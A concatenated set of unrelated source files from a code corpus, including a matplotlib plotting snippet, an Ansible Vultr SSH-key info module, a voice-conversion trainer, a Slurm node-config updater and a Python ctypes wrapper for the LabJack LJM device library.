genex = df['Thermococcus_sp._ES1_percent'][genes]
geney = df.Thermococcus_onnurineus_NA1_percent[genes]
plt.scatter(x=genex, y=geney, s=60, color=colors[::-1])
labels = ['fdhA', '4Fe-4S',
'MbhH', 'MbhH\'', 'MbhH\'', 'MbhH\'\'', 'MbhM', 'Mbh(K+L)', 'MbhN',
'MbhJ', 'MbhX', 'FocA',
'MbhB', 'MbhC', 'MbhD', 'Mbh(E+F)', 'MbhG', 'MbhA', 'MbhH\'\'\'']
for label, x, y, c, gid in zip(labels[::-1], genex, geney, colors[::-1], df.Thermococcus_barophilus_Ch5_gene[genes]):
print gid, label, c
plt.annotate(
label,
xy = (x, y), xytext = (-3, 3),
textcoords = 'offset points', ha = 'right', va = 'bottom',
color=c, size=14
# bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
# arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0')
)
plt.tight_layout()
plt.savefig('test.png', dpi=100)
plt.savefig('test.svg')
plt.savefig('test.eps', rasterize=True)
plt.show() | 1.671875 | 2 |
v2/espacioVacio.py | Davidgh96/LP_Coloca4 | 0 | 12765071 | import tkinter
from tkinter import *
class espacioVacio(Canvas):
def __init__(self, master=None):
Canvas.__init__(self)
self.configure(width=150, height=10) | 2.59375 | 3 |
python/testData/refactoring/extractmethod/OutNotEmptyStatements.after.py | jnthn/intellij-community | 2 | 12765072 | def f():
a = 10
result = 0
result = sum_squares(a, result)
print("Sum of squares: " + result)
def sum_squares(a_new, result_new):
while a_new < 10:
result_new += a_new * a_new
a_new += 1
return result_new
| 3.921875 | 4 |
ansible/venv/lib/python2.7/site-packages/ansible/modules/cloud/vultr/vultr_ssh_key_info.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 17 | 12765073 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, <NAME> <<EMAIL>>
# (c) 2019, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: vultr_ssh_key_info
short_description: Get information about the Vultr SSH keys available.
description:
- Get infos about SSH keys available.
version_added: "2.9"
author:
- "<NAME> (@Spredzy)"
- "<NAME> (@resmo)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Get Vultr SSH keys infos
vultr_ssh_key_info:
register: result
- name: Print the infos
debug:
var: result.vultr_ssh_key_info
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modification
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: str
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_retry_max_delay:
description: Exponential backoff delay in seconds between retries up to this max delay value.
returned: success
type: int
sample: 12
version_added: '2.9'
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: str
sample: "https://api.vultr.com"
vultr_ssh_key_info:
description: Response from Vultr API as list
returned: success
type: complex
contains:
id:
description: ID of the ssh key
returned: success
type: str
sample: 5904bc6ed9234
name:
description: Name of the ssh key
returned: success
type: str
sample: my ssh key
date_created:
description: Date the ssh key was created
returned: success
type: str
sample: "2017-08-26 12:47:48"
ssh_key:
description: SSH public key
returned: success
type: str
sample: "ssh-rsa AA... <EMAIL>"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrSSHKeyInfo(Vultr):
def __init__(self, module):
super(AnsibleVultrSSHKeyInfo, self).__init__(module, "vultr_ssh_key_info")
self.returns = {
'SSHKEYID': dict(key='id'),
'name': dict(),
'ssh_key': dict(),
'date_created': dict(),
}
def get_sshkeys(self):
return self.api_query(path="/v1/sshkey/list")
def parse_keys_list(keys_list):
if not keys_list:
return []
return [key for id, key in keys_list.items()]
def main():
argument_spec = vultr_argument_spec()
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
sshkey_info = AnsibleVultrSSHKeyInfo(module)
result = sshkey_info.get_result(parse_keys_list(sshkey_info.get_sshkeys()))
module.exit_json(**result)
if __name__ == '__main__':
main()
| 1.648438 | 2 |
agent/trainer.py | shayanthrn/AGAIN-VC | 3 | 12765074 | import os
import torch
from tqdm import tqdm
from .base import BaseAgent
from util.mylogger import get_writer
class Trainer(BaseAgent):
def __init__(self, config, args):
super().__init__(config, args)
if args.load != '':
self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
self.load_data(ckpt_path=args.load,
dataset_config=config.dataset,
dataloader_config=config.dataloader,
njobs=args.njobs)
self.model_state, self.step_fn = self.build_model(config.build)
self.model_state = self.load_model(self.model_state, args.load)
else:
self.ckpt_dir_flag, self.train_set, self.dev_set, self.train_loader, self.dev_loader = \
self.gen_data(ckpt_path=config.ckpt_dir, flag=config.flag,
dataset_config=config.dataset,
dataloader_config=config.dataloader,
njobs=args.njobs)
self.model_state, self.step_fn = self.build_model(config.build)
# use customed logger
# eg. wandb, tensorboard
self.writer = get_writer(config, args, self.ckpt_dir_flag)
def build_model(self, build_config):
return super().build_model(build_config, mode='train', device=self.device)
# ====================================================
# train
# ====================================================
def train(self, total_steps, verbose_steps, log_steps, save_steps, eval_steps):
while self.model_state['steps'] <= total_steps:
train_bar = tqdm(self.train_loader)
for data in train_bar:
self.model_state['steps'] += 1
meta = self.step_fn(self.model_state, data)
if self.model_state['steps'] % log_steps == 0:
if self.writer is None:
print('* self.writer is not implemented.')
else:
# self.writer.log(meta['log'], step=self.model_state['steps'])
mels = meta['mels']
_data = {}
for k, v in mels.items():
if v.shape[1] != 80:
v = torch.nn.functional.interpolate(v.transpose(1,2), 80).transpose(1,2)
_data[k] = (v.cpu().numpy()/5+1, self.mel2wav(v))
# self.writer.mels_summary(
# tag='train/seen',
# data=_data,
# sample_rate=22050,
# step=self.model_state['steps']
# )
if self.model_state['steps'] % verbose_steps == 0:
meta['log']['steps'] = self.model_state['steps']
train_bar.set_postfix(meta['log'])
if self.model_state['steps'] % save_steps == 0:
self.save_model(self.model_state, \
os.path.join(self.ckpt_dir_flag, f'steps_{self.model_state["steps"]}.pth'))
if self.model_state['steps'] % eval_steps == 0 and self.model_state['steps'] != 0:
self.evaluate()
# ====================================================
# evaluate
# ====================================================
def evaluate(self):
try:
data = next(self.dev_iter)
except :
self.dev_iter = iter(self.dev_loader)
data = next(self.dev_iter)
with torch.no_grad():
meta = self.step_fn(self.model_state, data, train=False)
mels = meta['mels']
_data = {}
for k, v in mels.items():
if v.shape[1] != 80:
v = torch.nn.functional.interpolate(v.transpose(1,2), 80).transpose(1,2)
_data[k] = (v.cpu().numpy()/5+1, self.mel2wav(v))
self.writer.mels_summary(
tag='dev/unseen',
data=_data,
sample_rate=22050,
step=self.model_state['steps']
) | 2.109375 | 2 |
roles/slurm/files/update_config.py | brandenm-nag/ansible | 0 | 12765075 | #! /opt/cloud_sdk/bin/python
import re
from typing import Dict, Optional
import yaml
import citc.utils
def load_yaml(filename) -> dict:
with open(filename, "r") as f:
return yaml.safe_load(f)
def get_limits() -> Dict[str, Dict[str, str]]:
"""
Until OCI has an API to fetch service limits, we have to hard-code
them in a file.
"""
return load_yaml("limits.yaml")
def get_shapes() -> Dict[str, Dict[str, str]]:
try:
return citc.utils.get_types_info()
except NotImplementedError:
return load_yaml("/etc/citc/shapes.yaml")
def get_mgmt_info() -> Dict[str, str]:
try:
return load_yaml("/etc/citc/mgmt_shape.yaml")
except FileNotFoundError:
return {}
def get_nodespace() -> Dict[str, Dict[str, str]]:
return load_yaml("/etc/citc/startnode.yaml")
def encode_nodename(shape_name: str, node_number: int, cluster_id: str, ad: Optional[int] = None) -> str:
if ad is not None:
return "{}-ad{}-{:0>4}".format(shape_name.lower().replace(".", "-"), ad, node_number)
else:
return "{}-{}-{:0>4}".format(cluster_id, shape_name.lower().replace(".", "-"), node_number)
def create_slurmconf_line(number: int, shape_info: Dict, shape: str, cluster_id, ad: Optional[int] = None):
nodename = encode_nodename(shape, number, cluster_id, ad)
arch = shape_info.get("arch", "x86_64")
features = "shape={shape},ad={ad},arch={arch},pg={pg}".format(shape=shape, ad=ad, arch=arch, pg=shape_info.get("cluster_group", False))
config_template = 'NodeName={nodename:40} State={state:7} SocketsPerBoard={sockets:<1} CoresPerSocket={cores_per_socket:<3} ThreadsPerCore={threads_per_core:<1} RealMemory={memory:<10} Gres="{gres}" Features="{features}"'
config = config_template.format(
nodename=nodename,
state="CLOUD",
sockets=shape_info.get("sockets", 1),
cores_per_socket=shape_info["cores_per_socket"],
threads_per_core=shape_info.get("threads_per_core", 1),
memory=shape_info["memory"],
gres=shape_info.get("gres", ""),
features=features,
)
return config
def get_node_configs(limits, shapes, mgmt_info, nodespace):
for shape, shape_counts in limits.items():
try:
shape_info = shapes[shape]
except KeyError as e:
print("Error: Could not find shape information for {}. \nPlease log a ticket at https://github.com/clusterinthecloud/terraform/issues/new".format(e))
continue
if isinstance(shape_counts, int):
for i in range(1, shape_counts+1):
yield create_slurmconf_line(i, shape_info, shape, nodespace["cluster_id"])
else:
for ad, ad_count in shape_counts.items():
if mgmt_info and shape == mgmt_info["mgmt_shape"] and ad == mgmt_info["mgmt_ad"]:
ad_count -= 1
for i in range(1, ad_count+1):
yield create_slurmconf_line(i, shape_info, shape, nodespace["cluster_id"], ad)
# TODO Make sure that any nodes which are no longer managed due to service limit reductions are terminated.
slurm_conf_filename = "/mnt/shared/etc/slurm/slurm.conf"
node_config = "\n".join(get_node_configs(get_limits(), get_shapes(), get_mgmt_info(), get_nodespace()))
chop = re.compile('(?<=# STARTNODES\n)(.*?)(?=\n?# ENDNODES)', re.DOTALL)
with open(slurm_conf_filename) as f:
all_config = f.read()
new_config = chop.sub('{}'.format(node_config), all_config)
with open(slurm_conf_filename, "w") as f:
f.write(new_config)
| 2.328125 | 2 |
labjack/ljm/ljm.py | LihongHerman/labjack-ljm-python | 0 | 12765076 | <gh_stars>0
"""
Cross-platform wrapper for the LJM library.
"""
import ctypes
import sys
from labjack.ljm import constants
from labjack.ljm import errorcodes
class _StreamCallbackData:
"""Class containing the stream callback information."""
def __init__(self, handle, callback):
self.callbackUser = callback
self.callbackWrapper = lambda arg: self.callbackUser(arg[0])
callbackC = ctypes.CFUNCTYPE(None, ctypes.POINTER(ctypes.c_int))
self.callbackLjm = callbackC(self.callbackWrapper)
self.argInner = ctypes.c_int(handle)
self.argRef = ctypes.byref(self.argInner)
class _ReconnectCallbackData:
"""Class containing the device reconnect callback information."""
def __init__(self, handle, callback):
self.callbackUser = callback
self.callbackWrapper = lambda arg: self.callbackUser(arg)
callbackC = ctypes.CFUNCTYPE(None, ctypes.c_int)
self.callbackLjm = callbackC(self.callbackWrapper)
self.argInner = ctypes.c_int(handle)
# Dictionaries for maintaining callback data objects. References need to be kept
# for the callback duration, otherwise the callback data collector will delete
# them causing a segfault when LJM tries to call the callback.
_g_streamCallbackData = {}
_g_reconnectCallbackData = {}
class LJMError(Exception):
"""Custom exception class for LJM specific errors."""
def __init__(self, errorCode=None, errorAddress=None, errorString=None):
self._errorCode = errorCode
self._errorAddress = errorAddress
if errorString is None:
self._errorString = ""
try:
if self._errorCode is not None:
self._errorString = errorToString(self._errorCode)
except:
pass
else:
self._errorString = str(errorString)
@property
def errorCode(self):
return self._errorCode
@property
def errorAddress(self):
return self._errorAddress
@property
def errorString(self):
return self._errorString
def __str__(self):
addrStr = ""
errorCodeStr = ""
if self._errorAddress is not None:
addrStr = "Address " + str(self._errorAddress) + ", "
if self._errorCode is not None:
errorCodeStr = "LJM library "
if errorcodes.WARNINGS_BEGIN <= self._errorCode <= errorcodes.WARNINGS_END:
errorCodeStr += "warning"
else:
errorCodeStr += "error"
errorCodeStr += " code " + str(self._errorCode) + " "
return addrStr + errorCodeStr + self._errorString
def _loadLibrary():
"""Returns a ctypes pointer to the LJM library."""
try:
libraryName = None
try:
if(sys.platform.startswith("win32") or sys.platform.startswith("cygwin")):
# Windows
libraryName = "LabJackM.dll"
if(sys.platform.startswith("linux")):
# Linux
libraryName = "libLabJackM.so"
if(sys.platform.startswith("darwin")):
# Mac OS X
libraryName = "libLabJackM.dylib"
if libraryName is not None:
if libraryName == "LabJackM.dll" and sys.platform.startswith("win32"):
return ctypes.WinDLL(libraryName)
else:
return ctypes.CDLL(libraryName)
except Exception:
if(sys.platform.startswith("darwin")):
# Mac OS X load failed. Try with absolute path.
try:
libraryName = "/usr/local/lib/libLabJackM.dylib"
return ctypes.CDLL(libraryName)
except Exception:
pass
e = sys.exc_info()[1]
raise LJMError(errorString="Cannot load the LJM library "+str(libraryName)+". "+str(e))
# Unsupported operating system
raise LJMError(errorString="Cannot load the LJM library. Unsupported platform "+sys.platform+".")
except LJMError:
ljme = sys.exc_info()[1]
print(str(type(ljme)) + ": " + str(ljme))
return None
_staticLib = _loadLibrary()
def listAll(deviceType, connectionType):
"""Scans for LabJack devices and returns lists describing the
devices.
Args:
deviceType: An integer that filters which devices will be
returned (labjack.ljm.constants.dtT7,
labjack.ljm.constants.dtDIGIT, etc.).
labjack.ljm.constants.dtANY is allowed.
connectionType: An integer that filters by connection type
(labjack.ljm.constants.ctUSB, labjack.ljm.constants.ctTCP,
etc). labjack.ljm.constants.ctANY is allowed.
Returns:
A tuple containing:
(numFound, aDeviceTypes, aConnectionTypes, aSerialNumbers,
aIPAddresses)
numFound: Number of devices found.
aDeviceTypes: List of device types for each of the numFound
devices.
aConnectionTypes: List of connection types for each of the
numFound devices.
aSerialNumbers: List of serial numbers for each of the numFound
devices.
aIPAddresses: List of IP addresses for each of the numFound
devices, but only if the connection type is TCP-based. For
each corresponding device for which aIPAddresses[i] is not
TCP-based, aIPAddresses[i] will be
labjack.ljm.constants.NO_IP_ADDRESS.
Raises:
LJMError: An error was returned from the LJM library call.
Note:
This function only shows what devices can be opened. To
actually open a device, use labjack.ljm.open/openS.
"""
cDev = ctypes.c_int32(deviceType)
cConn = ctypes.c_int32(connectionType)
cNumFound = ctypes.c_int32(0)
cDevTypes = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
cConnTypes = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
cSerNums = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
cIPAddrs = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
error = _staticLib.LJM_ListAll(cDev, cConn, ctypes.byref(cNumFound), ctypes.byref(cDevTypes), ctypes.byref(cConnTypes), ctypes.byref(cSerNums), ctypes.byref(cIPAddrs))
if error != errorcodes.NOERROR:
raise LJMError(error)
numFound = cNumFound.value
return numFound, _convertCtypeArrayToList(cDevTypes[0:numFound]), _convertCtypeArrayToList(cConnTypes[0:numFound]), _convertCtypeArrayToList(cSerNums[0:numFound]), _convertCtypeArrayToList(cIPAddrs[0:numFound])
def listAllS(deviceType, connectionType):
"""Scans for LabJack devices with string parameters and returns
lists describing the devices.
Args:
deviceType: A string that filters which devices will be returned
("LJM_dtT7", etc.). "LJM_dtANY" is allowed.
connectionType: A string that filters by connection type
("LJM_ctUSB", "LJM_ctTCP", etc). "LJM_ctANY" is allowed.
Returns:
A tuple containing:
(numFound, aDeviceTypes, aConnectionTypes, aSerialNumbers,
aIPAddresses)
numFound: Number of devices found.
aDeviceTypes: List of device types for each of the numFound
devices.
aConnectionTypes: List of connection types for each of the
numFound devices.
aSerialNumbers: List of serial numbers for each of the numFound
devices.
aIPAddresses: List of IP addresses for each of the numFound
devices, but only if the connection type is TCP-based. For
each corresponding device for which aIPAddresses[i] is not
TCP-based, aIPAddresses[i] will be
labjack.ljm.constants.NO_IP_ADDRESS.
Raises:
TypeError: deviceType or connectionType are not strings.
LJMError: An error was returned from the LJM library call.
Note:
This function only shows what devices can be opened. To
actually open a device, use labjack.ljm.open/openS.
"""
if not isinstance(deviceType, str):
raise TypeError("Expected a string instead of " + str(type(deviceType)) + ".")
if not isinstance(connectionType, str):
raise TypeError("Expected a string instead of " + str(type(connectionType)) + ".")
cNumFound = ctypes.c_int32(0)
cDevTypes = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
cConnTypes = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
cSerNums = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
cIPAddrs = (ctypes.c_int32*constants.LIST_ALL_SIZE)()
error = _staticLib.LJM_ListAllS(deviceType.encode("ascii"), connectionType.encode("ascii"), ctypes.byref(cNumFound), ctypes.byref(cDevTypes), ctypes.byref(cConnTypes), ctypes.byref(cSerNums), ctypes.byref(cIPAddrs))
if error != errorcodes.NOERROR:
raise LJMError(error)
numFound = cNumFound.value
return numFound, _convertCtypeArrayToList(cDevTypes[0:numFound]), _convertCtypeArrayToList(cConnTypes[0:numFound]), _convertCtypeArrayToList(cSerNums[0:numFound]), _convertCtypeArrayToList(cIPAddrs[0:numFound])
def listAllExtended(deviceType, connectionType, numAddresses, aAddresses, aNumRegs, maxNumFound):
"""Advanced version of listAll that performs an additional query of
arbitrary registers on the device.
Args:
deviceType: An integer containing the type of the device to be
connected (labjack.ljm.constants.dtT7,
labjack.ljm.constants.dtDIGIT, etc.).
labjack.ljm.constants.dtANY is allowed.
connectionType: An integer that filters by connection type
(labjack.ljm.constants.ctUSB,
labjack.ljm.constants.ctTCP, etc.).
labjack.ljm.constants.ctANY is allowed.
numAddresses: The number of addresses to query. Also the size of
aAddresses and aNumRegs.
aAddresses: List of addresses to query for each device that is
found.
aNumRegs: List of the number of registers to query for each
address. Each aNumRegs[i] corresponds to aAddresses[i].
maxNumFound: The maximum number of devices to find.
Returns:
A tuple containing:
(numFound, aDeviceTypes, aConnectionTypes, aSerialNumbers,
aIPAddresses, aBytes)
numFound: Number of devices found.
aDeviceTypes: List of device types for each of the numFound
devices.
aConnectionTypes: List of connection types for each of the
numFound devices.
aSerialNumbers: List of serial numbers for each of the numFound
devices.
aIPAddresses: List of IP addresses for each of the numFound
devices, but only if the connection type is TCP-based. For
each corresponding device for which aIPAddresses[i] is not
TCP-based, aIPAddresses[i] will be
labjack.ljm.constants.NO_IP_ADDRESS.
aBytes: List of the queried bytes sequentially. A device
represented by index i will have an aBytes index of:
(i * <the sum of aNumRegs> *
labjack.ljm.constants.BYTES_PER_REGISTER).
Raises:
LJMError: An error was returned from the LJM library call.
Note:
This function only shows what devices can be opened. To
actually open a device, use labjack.ljm.open/openS.
"""
cDev = ctypes.c_int32(deviceType)
cConn = ctypes.c_int32(connectionType)
cNumAddrs = ctypes.c_int32(numAddresses)
cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
cNumRegs = _convertListToCtypeArray(aNumRegs, ctypes.c_int32)
cMaxNumFound = ctypes.c_int32(maxNumFound)
cNumFound = ctypes.c_int32(0)
cDevTypes = (ctypes.c_int32*maxNumFound)()
cConnTypes = (ctypes.c_int32*maxNumFound)()
cSerNums = (ctypes.c_int32*maxNumFound)()
cIPAddrs = (ctypes.c_int32*maxNumFound)()
sumNumRegs = sum(aNumRegs[0:numAddresses])
cBytes = (ctypes.c_ubyte*(maxNumFound*sumNumRegs*constants.BYTES_PER_REGISTER))()
error = _staticLib.LJM_ListAllExtended(cDev, cConn, cNumAddrs, ctypes.byref(cAddrs), ctypes.byref(cNumRegs), cMaxNumFound, ctypes.byref(cNumFound), ctypes.byref(cDevTypes), ctypes.byref(cConnTypes), ctypes.byref(cSerNums), ctypes.byref(cIPAddrs), ctypes.byref(cBytes))
if error != errorcodes.NOERROR:
raise LJMError(error)
numFound = cNumFound.value
return numFound, _convertCtypeArrayToList(cDevTypes[0:numFound]), _convertCtypeArrayToList(cConnTypes[0:numFound]), _convertCtypeArrayToList(cSerNums[0:numFound]), _convertCtypeArrayToList(cIPAddrs[0:numFound]), _convertCtypeArrayToList(cBytes[0:(numFound*sumNumRegs*constants.BYTES_PER_REGISTER)])
def openS(deviceType="ANY", connectionType="ANY", identifier="ANY"):
"""Opens a LabJack device, and returns the device handle.
Args:
deviceType: A string containing the type of the device to be
connected, optionally prepended by "LJM_dt". Possible values
include "ANY", "T4", "T7", and "DIGIT".
connectionType: A string containing the type of the connection
desired, optionally prepended by "LJM_ct". Possible values
include "ANY", "USB", "TCP", "ETHERNET", and "WIFI".
identifier: A string identifying the device to be connected or
"LJM_idANY"/"ANY". This can be a serial number, IP address,
or device name. Device names may not contain periods.
Returns:
The new handle that represents a device connection upon success.
Raises:
TypeError: deviceType or connectionType are not strings.
LJMError: An error was returned from the LJM library call.
Note:
Args are not case-sensitive, and empty strings indicate the
same thing as "LJM_xxANY".
"""
if not isinstance(deviceType, str):
raise TypeError("Expected a string instead of " + str(type(deviceType)) + ".")
if not isinstance(connectionType, str):
raise TypeError("Expected a string instead of " + str(type(connectionType)) + ".")
identifier = str(identifier)
cHandle = ctypes.c_int32(0)
error = _staticLib.LJM_OpenS(deviceType.encode("ascii"), connectionType.encode("ascii"), identifier.encode("ascii"), ctypes.byref(cHandle))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cHandle.value
def open(deviceType=constants.ctANY, connectionType=constants.ctANY, identifier="ANY"):
"""Opens a LabJack device, and returns the device handle.
Args:
deviceType: An integer containing the type of the device to be
connected (labjack.ljm.constants.dtT4,
labjack.ljm.constants.dtT7, labjack.ljm.constants.dtANY,
etc.).
connectionType: An integer containing the type of connection
desired (labjack.ljm.constants.ctUSB,
labjack.ljm.constants.ctTCP, labjack.ljm.constants.ctANY,
etc.).
identifier: A string identifying the device to be connected or
"LJM_idANY"/"ANY". This can be a serial number, IP address,
or device name. Device names may not contain periods.
Returns:
The new handle that represents a device connection upon success.
Raises:
TypeError: deviceType or connectionType are not integers.
LJMError: An error was returned from the LJM library call.
Notes:
Args are not case-sensitive.
Empty strings indicate the same thing as "LJM_xxANY".
"""
cDev = ctypes.c_int32(deviceType)
cConn = ctypes.c_int32(connectionType)
identifier = str(identifier)
cHandle = ctypes.c_int32(0)
error = _staticLib.LJM_Open(cDev, cConn, identifier.encode("ascii"), ctypes.byref(cHandle))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cHandle.value
def getHandleInfo(handle):
"""Returns the device handle's details.
Args:
handle: A valid handle to an open device.
Returns:
A tuple containing:
(deviceType, connectionType, serialNumber, ipAddress, port,
maxBytesPerMB)
deviceType: The device type corresponding to an integer
constant such as labjack.ljm.constants.dtT7.
connectionType: The output device type corresponding to an
integer constant such as labjack.ljm.constants.ctUSB.
serialNumber: The serial number of the device.
ipAddress: The integer representation of the device's IP
address when connectionType is TCP-based. If connectionType
is not TCP-based, this will be
labjack.ljm.constants.NO_IP_ADDRESS. The integer can be
converted to a human-readable string with the
labjack.ljm.numberToIP function.
port: The port if the device connection is TCP-based, or the
pipe if the device connection is USB based.
maxBytesPerMB: The maximum packet size in number of bytes that
can be sent or received from this device. This can change
depending on connection and device type.
Raises:
LJMError: An error was returned from the LJM library call.
Note:
This function returns device information loaded during an open
call and therefore does not initiate communications with the
device. In other words, it is fast but will not represent
changes to serial number or IP address since the device was
opened.
"""
cDev = ctypes.c_int32(0)
cConn = ctypes.c_int32(0)
cSer = ctypes.c_int32(0)
cIPAddr = ctypes.c_int32(0)
cPort = ctypes.c_int32(0)
cPktMax = ctypes.c_int32(0)
error = _staticLib.LJM_GetHandleInfo(handle, ctypes.byref(cDev), ctypes.byref(cConn), ctypes.byref(cSer), ctypes.byref(cIPAddr), ctypes.byref(cPort), ctypes.byref(cPktMax))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cDev.value, cConn.value, cSer.value, cIPAddr.value, cPort.value, cPktMax.value
def close(handle):
"""Closes the connection to the device.
Args:
handle: A valid handle to an open device.
Raises:
LJMError: An error was returned from the LJM library call.
"""
error = _staticLib.LJM_Close(handle)
if error != errorcodes.NOERROR:
raise LJMError(error)
def closeAll():
"""Closes all connections to all devices.
Raises:
LJMError: An error was returned from the LJM library call.
"""
error = _staticLib.LJM_CloseAll()
if error != errorcodes.NOERROR:
raise LJMError(error)
def cleanInfo(infoHandle):
"""Cleans/deallocates an infoHandle.
Args:
infoHandle: The info handle to clean/deallocate.
Raises:
LJMError: An error was returned from the LJM library call.
Note:
Calling cleanInfo on the same handle twice will cause error
INVALID_INFO_HANDLE.
"""
cInfo = ctypes.c_int32(infoHandle)
error = _staticLib.LJM_CleanInfo(cInfo)
if error != errorcodes.NOERROR:
raise LJMError(error)
def eWriteAddress(handle, address, dataType, value):
"""Performs Modbus operations that writes a value to a device.
Args:
handle: A valid handle to an open device.
address: An address to write.
dataTypes: The data type corresponding to the address
(labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
etc.).
value: The value to write.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cAddr = ctypes.c_int32(address)
cType = ctypes.c_int32(dataType)
cVal = ctypes.c_double(value)
error = _staticLib.LJM_eWriteAddress(handle, cAddr, cType, cVal)
if error != errorcodes.NOERROR:
raise LJMError(error)
def eReadAddress(handle, address, dataType):
"""Performs Modbus operations that reads a value from a device.
Args:
handle: A valid handle to an open device.
address: An address to read.
dataTypes: The data type corresponding to the address
(labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
etc.).
Returns:
The read value.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cAddr = ctypes.c_int32(address)
cType = ctypes.c_int32(dataType)
cVal = ctypes.c_double(0)
error = _staticLib.LJM_eReadAddress(handle, cAddr, cType, ctypes.byref(cVal))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cVal.value
def eWriteName(handle, name, value):
"""Performs Modbus operations that writes a value to a device.
Args:
handle: A valid handle to an open device.
name: A name (string) to write.
value: The value to write.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
cVal = ctypes.c_double(value)
error = _staticLib.LJM_eWriteName(handle, name.encode("ascii"), cVal)
if error != errorcodes.NOERROR:
raise LJMError(error)
def eReadName(handle, name):
"""Performs Modbus operations that reads a value from a device.
Args:
handle: A valid handle to an open device.
name: A name (string) to read.
Returns:
The read value.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
cVal = ctypes.c_double(0)
error = _staticLib.LJM_eReadName(handle, name.encode("ascii"), ctypes.byref(cVal))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cVal.value
def eReadAddresses(handle, numFrames, aAddresses, aDataTypes):
"""Performs Modbus operations that reads values from a device.
Args:
handle: A valid handle to an open device.
numFrames: The total number of reads to perform.
aAddresses: List of addresses to read. This list needs to be at
least size numFrames.
aDataTypes: List of data types corresponding to aAddresses
(labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
etc.). This list needs to be at least size numFrames.
Returns:
A list of read values.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cNumFrames = ctypes.c_int32(numFrames)
cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
cVals = (ctypes.c_double*numFrames)()
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eReadAddresses(handle, cNumFrames, ctypes.byref(cAddrs), ctypes.byref(cTypes), ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cVals)
def eReadNames(handle, numFrames, aNames):
"""Performs Modbus operations that reads values from a device.
Args:
handle: A valid handle to an open device.
numFrames: The total number of reads to perform.
aNames: List of names (strings) to read. This list needs to be
at least size numFrames.
Returns:
A list of read values.
Raises:
TypeError: aNames is not a list of strings.
LJMError: An error was returned from the LJM library call.
"""
cNumFrames = ctypes.c_int32(numFrames)
asciiNames = []
for x in aNames:
if not isinstance(x, str):
raise TypeError("Expected a string list but found an item " + str(type(x)) + ".")
asciiNames.append(x.encode("ascii"))
cNames = _convertListToCtypeArray(asciiNames, ctypes.c_char_p)
cVals = (ctypes.c_double*numFrames)()
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eReadNames(handle, cNumFrames, cNames, ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cVals)
def eWriteAddresses(handle, numFrames, aAddresses, aDataTypes, aValues):
"""Performs Modbus operations that writes values to a device.
Args:
handle: A valid handle to an open device.
numFrames: The total number of writes to perform.
aAddresses: List of addresses to write. This list needs to be at
least size numFrames.
aDataTypes: List of data types corresponding to aAddresses
(labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
etc.). This list needs to be at least size numFrames.
aValues: The list of values to write. This list needs to be at
least size numFrames.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cNumFrames = ctypes.c_int32(numFrames)
cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
numFrames = len(cAddrs)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eWriteAddresses(handle, cNumFrames, ctypes.byref(cAddrs), ctypes.byref(cTypes), ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
